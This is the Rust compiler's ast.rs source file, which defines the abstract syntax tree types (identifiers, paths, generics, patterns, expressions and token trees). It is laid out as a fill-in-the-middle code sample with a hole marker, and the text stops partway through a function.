<|file_name|>ast.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // The Rust abstract syntax tree. pub use self::AsmDialect::*; pub use self::AttrStyle::*; pub use self::BindingMode::*; pub use self::BinOp_::*; pub use self::BlockCheckMode::*; pub use self::CaptureClause::*; pub use self::Decl_::*; pub use self::ExplicitSelf_::*; pub use self::Expr_::*; pub use self::FloatTy::*; pub use self::FunctionRetTy::*; pub use self::ForeignItem_::*; pub use self::ImplItem_::*; pub use self::InlinedItem::*; pub use self::IntTy::*; pub use self::Item_::*; pub use self::KleeneOp::*; pub use self::Lit_::*; pub use self::LitIntType::*; pub use self::LocalSource::*; pub use self::Mac_::*; pub use self::MacStmtStyle::*; pub use self::MetaItem_::*; pub use self::Mutability::*; pub use self::Pat_::*; pub use self::PathListItem_::*; pub use self::PatWildKind::*; pub use self::PrimTy::*; pub use self::Sign::*; pub use self::Stmt_::*; pub use self::StrStyle::*; pub use self::StructFieldKind::*; pub use self::TokenTree::*; pub use self::TraitItem_::*; pub use self::Ty_::*; pub use self::TyParamBound::*; pub use self::UintTy::*; pub use self::UnOp::*; pub use self::UnsafeSource::*; pub use self::VariantKind::*; pub use self::ViewPath_::*; pub use self::Visibility::*; pub use self::PathParameters::*; use codemap::{Span, Spanned, DUMMY_SP, ExpnId}; use abi::Abi; use ast_util; use ext::base; use ext::tt::macro_parser; use owned_slice::OwnedSlice; use parse::token::{InternedString, str_to_ident}; use parse::token; use parse::lexer; use print::pprust; use ptr::P; use std::cell::Cell; use std::fmt; use std::rc::Rc; use serialize::{Encodable, Decodable, Encoder, Decoder}; // FIXME #6993: in librustc, uses of "ident" should be replaced // by just "Name". /// An identifier contains a Name (index into the interner /// table) and a SyntaxContext to track renaming and /// macro expansion per Flatt et al., "Macros /// That Work Together" #[derive(Clone, Copy, Hash, PartialOrd, Eq, Ord)] pub struct Ident { pub name: Name, pub ctxt: SyntaxContext } impl Ident { /// Construct an identifier with the given name and an empty context: pub fn new(name: Name) -> Ident { Ident {name: name, ctxt: EMPTY_CTXT}} pub fn as_str<'a>(&'a self) -> &'a str { self.name.as_str() } } impl fmt::Debug for Ident { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}#{}", self.name, self.ctxt) } } impl fmt::Display for Ident { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(&self.name, f) } } impl fmt::Debug for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { let Name(nm) = *self; write!(f, "{:?}({})", token::get_name(*self), nm) } } impl fmt::Display for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(&token::get_name(*self), f) } } impl PartialEq for Ident { fn eq(&self, other: &Ident) -> bool { if self.ctxt == other.ctxt { self.name == other.name } else { // IF YOU SEE ONE OF THESE FAILS: it means that you're comparing // idents that have different contexts. You can't fix this without // knowing whether the comparison should be hygienic or non-hygienic. // if it should be non-hygienic (most things are), just compare the // 'name' fields of the idents. Or, even better, replace the idents // with Name's. // // On the other hand, if the comparison does need to be hygienic, // one example and its non-hygienic counterpart would be: // syntax::parse::token::Token::mtwt_eq // syntax::ext::tt::macro_parser::token_name_eq panic!("not allowed to compare these idents: {}, {}. \ Probably related to issue \\#6993", self, other); } } fn ne(&self, other: &Ident) -> bool { ! self.eq(other) } } /// A SyntaxContext represents a chain of macro-expandings /// and renamings. Each macro expansion corresponds to /// a fresh u32 // I'm representing this syntax context as an index into // a table, in order to work around a compiler bug // that's causing unreleased memory to cause core dumps // and also perhaps to save some work in destructor checks. // the special uint '0' will be used to indicate an empty // syntax context. // this uint is a reference to a table stored in thread-local // storage. pub type SyntaxContext = u32; pub const EMPTY_CTXT : SyntaxContext = 0; pub const ILLEGAL_CTXT : SyntaxContext = 1; /// A name is a part of an identifier, representing a string or gensym. It's /// the result of interning. #[derive(Eq, Ord, PartialEq, PartialOrd, Hash, RustcEncodable, RustcDecodable, Clone, Copy)] pub struct Name(pub u32); impl Name { pub fn as_str<'a>(&'a self) -> &'a str { unsafe { // FIXME #12938: can't use copy_lifetime since &str isn't a &T ::std::mem::transmute::<&str,&str>(&token::get_name(*self)) } } pub fn usize(&self) -> usize { let Name(nm) = *self; nm as usize } pub fn ident(&self) -> Ident { Ident { name: *self, ctxt: 0 } } } /// A mark represents a unique id associated with a macro expansion pub type Mrk = u32; impl Encodable for Ident { fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> { s.emit_str(&token::get_ident(*self)) } } impl Decodable for Ident { fn decode<D: Decoder>(d: &mut D) -> Result<Ident, D::Error> { Ok(str_to_ident(&try!(d.read_str())[..])) } } /// Function name (not all functions have names) pub type FnIdent = Option<Ident>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub struct Lifetime { pub id: NodeId, pub span: Span, pub name: Name } impl fmt::Debug for Lifetime { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "lifetime({}: {})", self.id, pprust::lifetime_to_string(self)) } } /// A lifetime definition, eg `'a: 'b+'c+'d` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct LifetimeDef { pub lifetime: Lifetime, pub bounds: Vec<Lifetime> } /// A "Path" is essentially Rust's notion of a name; for instance: /// std::cmp::PartialEq . It's represented as a sequence of identifiers, /// along with a bunch of supporting information. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Path { pub span: Span, /// A `::foo` path, is relative to the crate root rather than current /// module (like paths in an import). pub global: bool, /// The segments in the path: the things separated by `::`. pub segments: Vec<PathSegment>, } impl fmt::Debug for Path { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "path({})", pprust::path_to_string(self)) } } impl fmt::Display for Path { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", pprust::path_to_string(self)) } } /// A segment of a path: an identifier, an optional lifetime, and a set of /// types. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct PathSegment { /// The identifier portion of this path segment. pub identifier: Ident, /// Type/lifetime parameters attached to this path. They come in /// two flavors: `Path<A,B,C>` and `Path(A,B) -> C`. Note that /// this is more than just simple syntactic sugar; the use of /// parens affects the region binding rules, so we preserve the /// distinction. pub parameters: PathParameters, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum PathParameters { /// The `<'a, A,B,C>` in `foo::bar::baz::<'a, A,B,C>`<|fim▁hole|> impl PathParameters { pub fn none() -> PathParameters { AngleBracketedParameters(AngleBracketedParameterData { lifetimes: Vec::new(), types: OwnedSlice::empty(), bindings: OwnedSlice::empty(), }) } pub fn is_empty(&self) -> bool { match *self { AngleBracketedParameters(ref data) => data.is_empty(), // Even if the user supplied no types, something like // `X()` is equivalent to `X<(),()>`. ParenthesizedParameters(..) => false, } } pub fn has_lifetimes(&self) -> bool { match *self { AngleBracketedParameters(ref data) => !data.lifetimes.is_empty(), ParenthesizedParameters(_) => false, } } pub fn has_types(&self) -> bool { match *self { AngleBracketedParameters(ref data) => !data.types.is_empty(), ParenthesizedParameters(..) => true, } } /// Returns the types that the user wrote. Note that these do not necessarily map to the type /// parameters in the parenthesized case. pub fn types(&self) -> Vec<&P<Ty>> { match *self { AngleBracketedParameters(ref data) => { data.types.iter().collect() } ParenthesizedParameters(ref data) => { data.inputs.iter() .chain(data.output.iter()) .collect() } } } pub fn lifetimes(&self) -> Vec<&Lifetime> { match *self { AngleBracketedParameters(ref data) => { data.lifetimes.iter().collect() } ParenthesizedParameters(_) => { Vec::new() } } } pub fn bindings(&self) -> Vec<&P<TypeBinding>> { match *self { AngleBracketedParameters(ref data) => { data.bindings.iter().collect() } ParenthesizedParameters(_) => { Vec::new() } } } } /// A path like `Foo<'a, T>` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct AngleBracketedParameterData { /// The lifetime parameters for this path segment. pub lifetimes: Vec<Lifetime>, /// The type parameters for this path segment, if present. pub types: OwnedSlice<P<Ty>>, /// Bindings (equality constraints) on associated types, if present. /// E.g., `Foo<A=Bar>`. pub bindings: OwnedSlice<P<TypeBinding>>, } impl AngleBracketedParameterData { fn is_empty(&self) -> bool { self.lifetimes.is_empty() && self.types.is_empty() && self.bindings.is_empty() } } /// A path like `Foo(A,B) -> C` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ParenthesizedParameterData { /// Overall span pub span: Span, /// `(A,B)` pub inputs: Vec<P<Ty>>, /// `C` pub output: Option<P<Ty>>, } pub type CrateNum = u32; pub type NodeId = u32; #[derive(Clone, Eq, Ord, PartialOrd, PartialEq, RustcEncodable, RustcDecodable, Hash, Copy)] pub struct DefId { pub krate: CrateNum, pub node: NodeId, } fn default_def_id_debug(_: DefId, _: &mut fmt::Formatter) -> fmt::Result { Ok(()) } thread_local!(pub static DEF_ID_DEBUG: Cell<fn(DefId, &mut fmt::Formatter) -> fmt::Result> = Cell::new(default_def_id_debug)); impl fmt::Debug for DefId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { try!(write!(f, "DefId {{ krate: {}, node: {} }}", self.krate, self.node)); DEF_ID_DEBUG.with(|def_id_debug| def_id_debug.get()(*self, f)) } } impl DefId { /// Read the node id, asserting that this def-id is krate-local. pub fn local_id(&self) -> NodeId { assert_eq!(self.krate, LOCAL_CRATE); self.node } } /// Item definitions in the currently-compiled crate would have the CrateNum /// LOCAL_CRATE in their DefId. pub const LOCAL_CRATE: CrateNum = 0; pub const CRATE_NODE_ID: NodeId = 0; /// When parsing and doing expansions, we initially give all AST nodes this AST /// node value. Then later, in the renumber pass, we renumber them to have /// small, positive ids. pub const DUMMY_NODE_ID: NodeId = !0; /// The AST represents all type param bounds as types. /// typeck::collect::compute_bounds matches these against /// the "special" built-in traits (see middle::lang_items) and /// detects Copy, Send and Sync. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TyParamBound { TraitTyParamBound(PolyTraitRef, TraitBoundModifier), RegionTyParamBound(Lifetime) } /// A modifier on a bound, currently this is only used for `?Sized`, where the /// modifier is `Maybe`. Negative bounds should also be handled here. #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TraitBoundModifier { None, Maybe, } pub type TyParamBounds = OwnedSlice<TyParamBound>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TyParam { pub ident: Ident, pub id: NodeId, pub bounds: TyParamBounds, pub default: Option<P<Ty>>, pub span: Span } /// Represents lifetimes and type parameters attached to a declaration /// of a function, enum, trait, etc. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Generics { pub lifetimes: Vec<LifetimeDef>, pub ty_params: OwnedSlice<TyParam>, pub where_clause: WhereClause, } impl Generics { pub fn is_lt_parameterized(&self) -> bool { !self.lifetimes.is_empty() } pub fn is_type_parameterized(&self) -> bool { !self.ty_params.is_empty() } pub fn is_parameterized(&self) -> bool { self.is_lt_parameterized() || self.is_type_parameterized() } } /// A `where` clause in a definition #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereClause { pub id: NodeId, pub predicates: Vec<WherePredicate>, } /// A single predicate in a `where` clause #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum WherePredicate { /// A type binding, eg `for<'c> Foo: Send+Clone+'c` BoundPredicate(WhereBoundPredicate), /// A lifetime predicate, e.g. `'a: 'b+'c` RegionPredicate(WhereRegionPredicate), /// An equality predicate (unsupported) EqPredicate(WhereEqPredicate) } /// A type bound, eg `for<'c> Foo: Send+Clone+'c` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereBoundPredicate { pub span: Span, /// Any lifetimes from a `for` binding pub bound_lifetimes: Vec<LifetimeDef>, /// The type being bounded pub bounded_ty: P<Ty>, /// Trait and lifetime bounds (`Clone+Send+'static`) pub bounds: OwnedSlice<TyParamBound>, } /// A lifetime predicate, e.g. `'a: 'b+'c` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereRegionPredicate { pub span: Span, pub lifetime: Lifetime, pub bounds: Vec<Lifetime>, } /// An equality predicate (unsupported), e.g. `T=int` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereEqPredicate { pub id: NodeId, pub span: Span, pub path: Path, pub ty: P<Ty>, } /// The set of MetaItems that define the compilation environment of the crate, /// used to drive conditional compilation pub type CrateConfig = Vec<P<MetaItem>> ; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Crate { pub module: Mod, pub attrs: Vec<Attribute>, pub config: CrateConfig, pub span: Span, pub exported_macros: Vec<MacroDef>, } pub type MetaItem = Spanned<MetaItem_>; #[derive(Clone, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum MetaItem_ { MetaWord(InternedString), MetaList(InternedString, Vec<P<MetaItem>>), MetaNameValue(InternedString, Lit), } // can't be derived because the MetaList requires an unordered comparison impl PartialEq for MetaItem_ { fn eq(&self, other: &MetaItem_) -> bool { match *self { MetaWord(ref ns) => match *other { MetaWord(ref no) => (*ns) == (*no), _ => false }, MetaNameValue(ref ns, ref vs) => match *other { MetaNameValue(ref no, ref vo) => { (*ns) == (*no) && vs.node == vo.node } _ => false }, MetaList(ref ns, ref miss) => match *other { MetaList(ref no, ref miso) => { ns == no && miss.iter().all(|mi| miso.iter().any(|x| x.node == mi.node)) } _ => false } } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Block { /// Statements in a block pub stmts: Vec<P<Stmt>>, /// An expression at the end of the block /// without a semicolon, if any pub expr: Option<P<Expr>>, pub id: NodeId, /// Distinguishes between `unsafe { ... }` and `{ ... }` pub rules: BlockCheckMode, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Pat { pub id: NodeId, pub node: Pat_, pub span: Span, } impl fmt::Debug for Pat { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "pat({}: {})", self.id, pprust::pat_to_string(self)) } } /// A single field in a struct pattern /// /// Patterns like the fields of Foo `{ x, ref y, ref mut z }` /// are treated the same as` x: x, y: ref y, z: ref mut z`, /// except is_shorthand is true #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct FieldPat { /// The identifier for the field pub ident: Ident, /// The pattern the field is destructured to pub pat: P<Pat>, pub is_shorthand: bool, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BindingMode { BindByRef(Mutability), BindByValue(Mutability), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PatWildKind { /// Represents the wildcard pattern `_` PatWildSingle, /// Represents the wildcard pattern `..` PatWildMulti, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Pat_ { /// Represents a wildcard pattern (either `_` or `..`) PatWild(PatWildKind), /// A PatIdent may either be a new bound variable, /// or a nullary enum (in which case the third field /// is None). /// /// In the nullary enum case, the parser can't determine /// which it is. The resolver determines this, and /// records this pattern's NodeId in an auxiliary /// set (of "PatIdents that refer to nullary enums") PatIdent(BindingMode, SpannedIdent, Option<P<Pat>>), /// "None" means a * pattern where we don't bind the fields to names. PatEnum(Path, Option<Vec<P<Pat>>>), /// An associated const named using the qualified path `<T>::CONST` or /// `<T as Trait>::CONST`. Associated consts from inherent impls can be /// referred to as simply `T::CONST`, in which case they will end up as /// PatEnum, and the resolver will have to sort that out. PatQPath(QSelf, Path), /// Destructuring of a struct, e.g. `Foo {x, y, ..}` /// The `bool` is `true` in the presence of a `..` PatStruct(Path, Vec<Spanned<FieldPat>>, bool), /// A tuple pattern `(a, b)` PatTup(Vec<P<Pat>>), /// A `box` pattern PatBox(P<Pat>), /// A reference pattern, e.g. `&mut (a, b)` PatRegion(P<Pat>, Mutability), /// A literal PatLit(P<Expr>), /// A range pattern, e.g. `1...2` PatRange(P<Expr>, P<Expr>), /// [a, b, ..i, y, z] is represented as: /// PatVec(box [a, b], Some(i), box [y, z]) PatVec(Vec<P<Pat>>, Option<P<Pat>>, Vec<P<Pat>>), /// A macro pattern; pre-expansion PatMac(Mac), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Mutability { MutMutable, MutImmutable, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BinOp_ { /// The `+` operator (addition) BiAdd, /// The `-` operator (subtraction) BiSub, /// The `*` operator (multiplication) BiMul, /// The `/` operator (division) BiDiv, /// The `%` operator (modulus) BiRem, /// The `&&` operator (logical and) BiAnd, /// The `||` operator (logical or) BiOr, /// The `^` operator (bitwise xor) BiBitXor, /// The `&` operator (bitwise and) BiBitAnd, /// The `|` operator (bitwise or) BiBitOr, /// The `<<` operator (shift left) BiShl, /// The `>>` operator (shift right) BiShr, /// The `==` operator (equality) BiEq, /// The `<` operator (less than) BiLt, /// The `<=` operator (less than or equal to) BiLe, /// The `!=` operator (not equal to) BiNe, /// The `>=` operator (greater than or equal to) BiGe, /// The `>` operator (greater than) BiGt, } pub type BinOp = Spanned<BinOp_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum UnOp { /// The `box` operator UnUniq, /// The `*` operator for dereferencing UnDeref, /// The `!` operator for logical inversion UnNot, /// The `-` operator for negation UnNeg } /// A statement pub type Stmt = Spanned<Stmt_>; impl fmt::Debug for Stmt { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "stmt({}: {})", ast_util::stmt_id(self), pprust::stmt_to_string(self)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub enum Stmt_ { /// Could be an item or a local (let) binding: StmtDecl(P<Decl>, NodeId), /// Expr without trailing semi-colon (must have unit type): StmtExpr(P<Expr>, NodeId), /// Expr with trailing semi-colon (may have any type): StmtSemi(P<Expr>, NodeId), StmtMac(P<Mac>, MacStmtStyle), } #[derive(Clone, Copy, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum MacStmtStyle { /// The macro statement had a trailing semicolon, e.g. `foo! { ... };` /// `foo!(...);`, `foo![...];` MacStmtWithSemicolon, /// The macro statement had braces; e.g. foo! { ... } MacStmtWithBraces, /// The macro statement had parentheses or brackets and no semicolon; e.g. /// `foo!(...)`. All of these will end up being converted into macro /// expressions. MacStmtWithoutBraces, } /// Where a local declaration came from: either a true `let ... = /// ...;`, or one desugared from the pattern of a for loop. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum LocalSource { LocalLet, LocalFor, } // FIXME (pending discussion of #1697, #2178...): local should really be // a refinement on pat. /// Local represents a `let` statement, e.g., `let <pat>:<ty> = <expr>;` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Local { pub pat: P<Pat>, pub ty: Option<P<Ty>>, /// Initializer expression to set the value, if any pub init: Option<P<Expr>>, pub id: NodeId, pub span: Span, pub source: LocalSource, } pub type Decl = Spanned<Decl_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Decl_ { /// A local (let) binding: DeclLocal(P<Local>), /// An item binding: DeclItem(P<Item>), } /// represents one arm of a 'match' #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Arm { pub attrs: Vec<Attribute>, pub pats: Vec<P<Pat>>, pub guard: Option<P<Expr>>, pub body: P<Expr>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Field { pub ident: SpannedIdent, pub expr: P<Expr>, pub span: Span, } pub type SpannedIdent = Spanned<Ident>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BlockCheckMode { DefaultBlock, UnsafeBlock(UnsafeSource), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum UnsafeSource { CompilerGenerated, UserProvided, } /// An expression #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash,)] pub struct Expr { pub id: NodeId, pub node: Expr_, pub span: Span, } impl fmt::Debug for Expr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "expr({}: {})", self.id, pprust::expr_to_string(self)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Expr_ { /// First expr is the place; second expr is the value. ExprBox(Option<P<Expr>>, P<Expr>), /// An array (`[a, b, c, d]`) ExprVec(Vec<P<Expr>>), /// A function call /// /// The first field resolves to the function itself, /// and the second field is the list of arguments ExprCall(P<Expr>, Vec<P<Expr>>), /// A method call (`x.foo::<Bar, Baz>(a, b, c, d)`) /// /// The `SpannedIdent` is the identifier for the method name. /// The vector of `Ty`s are the ascripted type parameters for the method /// (within the angle brackets). /// /// The first element of the vector of `Expr`s is the expression that evaluates /// to the object on which the method is being called on (the receiver), /// and the remaining elements are the rest of the arguments. /// /// Thus, `x.foo::<Bar, Baz>(a, b, c, d)` is represented as /// `ExprMethodCall(foo, [Bar, Baz], [x, a, b, c, d])`. ExprMethodCall(SpannedIdent, Vec<P<Ty>>, Vec<P<Expr>>), /// A tuple (`(a, b, c ,d)`) ExprTup(Vec<P<Expr>>), /// A binary operation (For example: `a + b`, `a * b`) ExprBinary(BinOp, P<Expr>, P<Expr>), /// A unary operation (For example: `!x`, `*x`) ExprUnary(UnOp, P<Expr>), /// A literal (For example: `1u8`, `"foo"`) ExprLit(P<Lit>), /// A cast (`foo as f64`) ExprCast(P<Expr>, P<Ty>), /// An `if` block, with an optional else block /// /// `if expr { block } else { expr }` ExprIf(P<Expr>, P<Block>, Option<P<Expr>>), /// An `if let` expression with an optional else block /// /// `if let pat = expr { block } else { expr }` /// /// This is desugared to a `match` expression. ExprIfLet(P<Pat>, P<Expr>, P<Block>, Option<P<Expr>>), // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. /// A while loop, with an optional label /// /// `'label: while expr { block }` ExprWhile(P<Expr>, P<Block>, Option<Ident>), // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. /// A while-let loop, with an optional label /// /// `'label: while let pat = expr { block }` /// /// This is desugared to a combination of `loop` and `match` expressions. ExprWhileLet(P<Pat>, P<Expr>, P<Block>, Option<Ident>), // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. /// A for loop, with an optional label /// /// `'label: for pat in expr { block }` /// /// This is desugared to a combination of `loop` and `match` expressions. ExprForLoop(P<Pat>, P<Expr>, P<Block>, Option<Ident>), /// Conditionless loop (can be exited with break, continue, or return) /// /// `'label: loop { block }` // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. ExprLoop(P<Block>, Option<Ident>), /// A `match` block, with a source that indicates whether or not it is /// the result of a desugaring, and if so, which kind. ExprMatch(P<Expr>, Vec<Arm>, MatchSource), /// A closure (for example, `move |a, b, c| {a + b + c}`) ExprClosure(CaptureClause, P<FnDecl>, P<Block>), /// A block (`{ ... }`) ExprBlock(P<Block>), /// An assignment (`a = foo()`) ExprAssign(P<Expr>, P<Expr>), /// An assignment with an operator /// /// For example, `a += 1`. ExprAssignOp(BinOp, P<Expr>, P<Expr>), /// Access of a named struct field (`obj.foo`) ExprField(P<Expr>, SpannedIdent), /// Access of an unnamed field of a struct or tuple-struct /// /// For example, `foo.0`. ExprTupField(P<Expr>, Spanned<usize>), /// An indexing operation (`foo[2]`) ExprIndex(P<Expr>, P<Expr>), /// A range (`1..2`, `1..`, or `..2`) ExprRange(Option<P<Expr>>, Option<P<Expr>>), /// Variable reference, possibly containing `::` and/or type /// parameters, e.g. foo::bar::<baz>. /// /// Optionally "qualified", /// e.g. `<Vec<T> as SomeTrait>::SomeType`. ExprPath(Option<QSelf>, Path), /// A referencing operation (`&a` or `&mut a`) ExprAddrOf(Mutability, P<Expr>), /// A `break`, with an optional label to break ExprBreak(Option<Ident>), /// A `continue`, with an optional label ExprAgain(Option<Ident>), /// A `return`, with an optional value to be returned ExprRet(Option<P<Expr>>), /// Output of the `asm!()` macro ExprInlineAsm(InlineAsm), /// A macro invocation; pre-expansion ExprMac(Mac), /// A struct literal expression. /// /// For example, `Foo {x: 1, y: 2}`, or /// `Foo {x: 1, .. base}`, where `base` is the `Option<Expr>`. ExprStruct(Path, Vec<Field>, Option<P<Expr>>), /// A vector literal constructed from one repeated element. /// /// For example, `[1u8; 5]`. The first expression is the element /// to be repeated; the second is the number of times to repeat it. ExprRepeat(P<Expr>, P<Expr>), /// No-op: used solely so we can pretty-print faithfully ExprParen(P<Expr>) } /// The explicit Self type in a "qualified path". The actual /// path, including the trait and the associated item, is stored /// separately. `position` represents the index of the associated /// item qualified with this Self type. /// /// <Vec<T> as a::b::Trait>::AssociatedItem /// ^~~~~ ~~~~~~~~~~~~~~^ /// ty position = 3 /// /// <Vec<T>>::AssociatedItem /// ^~~~~ ^ /// ty position = 0 #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct QSelf { pub ty: P<Ty>, pub position: usize } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum MatchSource { Normal, IfLetDesugar { contains_else_clause: bool }, WhileLetDesugar, ForLoopDesugar, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum CaptureClause { CaptureByValue, CaptureByRef, } /// A delimited sequence of token trees #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Delimited { /// The type of delimiter pub delim: token::DelimToken, /// The span covering the opening delimiter pub open_span: Span, /// The delimited sequence of token trees pub tts: Vec<TokenTree>, /// The span covering the closing delimiter pub close_span: Span, } impl Delimited { /// Returns the opening delimiter as a token. pub fn open_token(&self) -> token::Token { token::OpenDelim(self.delim) } /// Returns the closing delimiter as a token. pub fn close_token(&self) -> token::Token { token::CloseDelim(self.delim) } /// Returns the opening delimiter as a token tree. pub fn open_tt(&self) -> TokenTree { TtToken(self.open_span, self.open_token()) } /// Returns the closing delimiter as a token tree. pub fn close_tt(&self) -> TokenTree { TtToken(self.close_span, self.close_token()) } } /// A sequence of token treesee #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct SequenceRepetition { /// The sequence of token trees pub tts: Vec<TokenTree>, /// The optional separator pub separator: Option<token::Token>, /// Whether the sequence can be repeated zero (*), or one or more times (+) pub op: KleeneOp, /// The number of `MatchNt`s that appear in the sequence (and subsequences) pub num_captures: usize, } /// A Kleene-style [repetition operator](http://en.wikipedia.org/wiki/Kleene_star) /// for token sequences. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum KleeneOp { ZeroOrMore, OneOrMore, } /// When the main rust parser encounters a syntax-extension invocation, it /// parses the arguments to the invocation as a token-tree. This is a very /// loose structure, such that all sorts of different AST-fragments can /// be passed to syntax extensions using a uniform type. /// /// If the syntax extension is an MBE macro, it will attempt to match its /// LHS token tree against the provided token tree, and if it finds a /// match, will transcribe the RHS token tree, splicing in any captured /// macro_parser::matched_nonterminals into the `SubstNt`s it finds. /// /// The RHS of an MBE macro is the only place `SubstNt`s are substituted. /// Nothing special happens to misnamed or misplaced `SubstNt`s. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TokenTree { /// A single token TtToken(Span, token::Token), /// A delimited sequence of token trees TtDelimited(Span, Rc<Delimited>), // This only makes sense in MBE macros. /// A kleene-style repetition sequence with a span // FIXME(eddyb) #12938 Use DST. TtSequence(Span, Rc<SequenceRepetition>), } impl TokenTree { pub fn len(&self) -> usize { match *self { TtToken(_, token::DocComment(_)) => 2, TtToken(_, token::SpecialVarNt(..)) => 2, TtToken(_, token::MatchNt(..)) => 3, TtDelimited(_, ref delimed) => { delimed.tts.len() + 2 } TtSequence(_, ref seq) => { seq.tts.len() } TtToken(..) => 0 } } pub fn get_tt(&self, index: usize) -> TokenTree { match (self, index) { (&TtToken(sp, token::DocComment(_)), 0) => { TtToken(sp, token::Pound) } (&TtToken(sp, token::DocComment(name)), 1) => { TtDelimited(sp, Rc::new(Delimited { delim: token::Bracket, open_span: sp, tts: vec![TtToken(sp, token::Ident(token::str_to_ident("doc"), token::Plain)), TtToken(sp, token::Eq), TtToken(sp, token::Literal(token::StrRaw(name, 0), None))], close_span: sp, })) } (&TtDelimited(_, ref delimed), _) => { if index == 0 { return delimed.open_tt(); } if index == delimed.tts.len() + 1 { return delimed.close_tt(); } delimed.tts[index - 1].clone() } (&TtToken(sp, token::SpecialVarNt(var)), _) => { let v = [TtToken(sp, token::Dollar), TtToken(sp, token::Ident(token::str_to_ident(var.as_str()), 